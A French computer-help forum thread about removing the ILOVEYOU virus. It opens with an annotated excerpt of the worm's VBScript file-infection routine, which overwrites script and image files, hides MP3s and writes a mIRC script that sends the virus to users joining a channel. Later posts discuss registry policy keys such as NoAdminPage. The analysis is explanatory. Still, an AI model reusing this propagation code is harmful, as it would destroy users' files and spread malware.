[Résolu] Suppression du virus "iloveyou"

[megataupe]

Pour ceux qui veulent en savoir un peu plus sur le code du plus célébre virus des années 2000, voici une description de son action sur les fichiers. Je précise pour les apprentis hackers que ce code est inexploitable tel quel.

 

Infectfiles

 

Cette partie du virus "infecte" les fichiers vbs, vbe, js, jse, css, wsh, sct, hta (qui sont effacés et remplacés par le code du virus). Les fichiers *.jpg et *.jpeg sont effacés apres avoir créé des copies du virus *.jpg.vbs et *.jpeg.vbs, les fichiers *.mp3 et *.mp2 son chachés (cfr attributs de fichiers) et des fichiers *.mp3.vbs et *.mp2.vbs sont créés, contenant ... le code du virus, eh oui !!! Si le virus trouve un répertoire contenant mirc, le fichier script.ini est écrasé et remplacé par un code envoyant automatiquement le code du virus(au format html) à toute personne se joignant a un channel ou l'ordinateur infecté se trouve.

 

sub infectfiles(folderspec) = 20 Infecte les fichiers du dossier actuel

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3 Déclaration des variables

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc Pour chaque fichier du directory

ext = fso.GetExtensionName(f1.path) Récupération de l'extension du fichier

ext = lcase(ext) Mise de l'extension en minuscules

s = lcase(f1.name) Mise du nom de fichier en minuscule

if (ext = "vbs") or (ext = "vbe") then s'il s'agit d'un VBS ou d'un VBE.

set ap = fso.OpenTextFile(f1.path, 2, true) Ouverture du fichier.

ap.write vbscopy Ecriture tu code du virus sur le fichier

ap.close Fermeture du fichier

elseif(ext = "js") or (ext = "jse") or (ext = "css") or (ext = "wsh") or (ext = "sct") or (ext = "hta") then S'il s'agit d'un JS, d'un JSE, CSS, WSH, SCT ou HTA

set ap = fso.OpenTextFile(f1.path,2,true) Ouverture du fichier

ap.write vbscopy Copie du virus

ap.close Fermeture du fichier

bname = fso.GetBaseName(f1.path) bname : nom du fichier source

set cop = fso.GetFile(f1.path) cop : nom du fichier du virus (= au nom du fichier source)

cop.copy(folderspec & "\" & bname & ".vbs") Copie du fichier modifié, avec l'extension .VBS en plus

fso.DeleteFile(f1.path) Supression du fichier original

elseif(ext = "jpg") or (ext = "jpeg") then S'il s'agit d'un JPG (ou JPEG)

set ap = fso.OpenTextFile(f1.path,2,true) Ouverture du fichier

ap.write vbscopy Copie du code du virus

ap.close Fermeture du fichier

set cop = fso.GetFile(f1.path) Nom du fichier "infecté"

cop.copy(f1.path & ".vbs") Copie du fichier "infecté" sous le nouveau nom

fso.DeleteFile(f1.path) Supression du fichier original

elseif(ext = "mp3") or (ext = "mp2") then S'il s'agit d'un MP3 ou d'un MP2

set mp3 = fso.CreateTextFile(f1.path & ".vbs") Création du fichier .mp3.vbs (ou .mp2.vbs)

mp3.write vbscopy Copie du code du virus

mp3.close Fermeture du fichier mp3-mp2

set att = fso.GetFile(f1.path)

att.attributes = att.attributes + 2 Rend le fichier actuel caché

end if

if (eq<>folderspec) then

if (s = "mirc32.exe") or (s = "mlink32.exe") or (s = "mirc.ini") or (s = "script.ini") or (s = "mirc.hlp") then Si le fichier actuel est un fichier mirc,

set scriptini = fso.CreateTextFile(folderspec & "\script.ini") on créé un fichier script

scriptini.WriteLine "[script]" Ecriture du contenu du fichier script

scriptini.WriteLine ";mIRC Script"

scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"

scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"

scriptini.WriteLine ";"

scriptini.WriteLine ";Khaled Mardam-Bey"

scriptini.WriteLine ";http://www.mirc.com"

scriptini.WriteLine ";"

scriptini.WriteLine "n0 = on 1:JOIN:#:{" Quand une personne arrive sur le channel

scriptini.WriteLine "n1 = /if ( $nick == $me ) { halt }" si cette personne n'est pas nous-même

scriptini.WriteLine "n2 = /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" Envoi du fichier .htm infecté

scriptini.WriteLine "n3=}"

scriptini.close Fermeture du fichier script

eq = folderspec

end if

end if

next = 20

end sub

[ipl_001]

Rebonsoir à tous,

 

Tiens ! C'est bizarre ! Dans un post précédent (ipl_001 post aujourd'hui à 22h23), j'ai reproduit un extrait de Sophos -> http://www.sophos.com/virusinfo/analyses/w32assirala.html

donnant des clés de BdR :

HKCR\software\microsoft\windows\currentversion\policies\system\

noadminpage = 1

et autres...

Je ne savais pas qu'il y avait là des restrictions possibles !!! Je les aurais cherchées dans HKCU ou HKLM... les traitres !

[Invité tesgaz]

HKCR\software\microsoft\windows\currentversion\policies\system\

noadminpage = 1

et autres...

Je ne savais pas qu'il y avait là des restrictions possibles !!! Je les aurais cherchées dans HKCU ou HKLM... les traitres !

 

Salut à tous,

 

ipl,

 

à mon avis , c'est une coquille

 

HKEY_CLASSES_ROOT\software\microsoft\ existe, mais il n'y a pas le dossier Windows derriere

[Rafiot]

Bonsoir à tous,

 

ce chemin existe dans HKEY_LOCAL_MACHINE : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system

mais il n'y a pas de "noadminpage"

[Invité tesgaz]

Bonsoir à tous,

 

ce chemin existe dans HKEY_LOCAL_MACHINE : HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system

mais il n'y a pas de "noadminpage"

520749[/snapback]

 

heureusement que la valeur n'est pas présente sur ton systeme

[ipl_001]

Bonsoir tesgaz,

Salut à tous,

 

ipl,

 

à mon avis , c'est une coquille

 

HKEY_CLASSES_ROOT\software\microsoft\  existe, mais il n'y a pas le dossier Windows derriere

520743[/snapback]

Si, si, il y a bien ce chemin dans mon système :

HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer avec les sous-clés RecentDocs et RunMRU

...

Sois rassuré, je n'ai pas de noAdminPage ! LOL

[Invité tesgaz]

tiens, c'est marrant, je ne l'ai pas sur mon systeme

j'ai juste 3 sous-dossiers :

Media player

Multimedia

WindowsMedia

 

bizarre, bizarre, je vais mener une enquête, j'appelle de suite Navarro

[Rafiot]

Bonjour à tous,

 

Je n'ai aucune idée de ce en quoi ca consiste, je me souvenais simplement etre allé faire un tour dans ce coin de la BDR dernièrement , "noAdminPage" correspond à quoi en fait ?

[megataupe]

Bonjour Rafiot. Voici la liste des restrictions que l'on peut définir pour restreindre certains accès au Panneau de Configuration, dont NoAdminPage :

 

NoDispCPL - désactive l'option "Affichage"

NoDispBackgroundPage - cache la page "Fond d'écran"

NoDispScrSavPage - cache la page "Economiseur d'écran"

NoDispAppearancePage - cache la page "Apparence"

NoDispSettingsPage - cache la page "Paramètres"

NoSecCPL - désactive l'option "Utilisateurs"

NoPwdPage - cache la page "Changer le mot de passe"

NoAdminPage - cache la page "Administration à distance"

NoProfilePage - cache la page "Profil d'utilisateur"

NoDevMgrPage - cache la page "Gestionnaire de périphériques"

NoConfigPage - cache la page "Profil matériel"

NoFileSysPage - cache le bouton "Système de fichiers"

NoVirtMemPage - cache le bouton "Mémoire virtuelle"

[Rafiot]

Bonjour megataupe et merci pour ces informations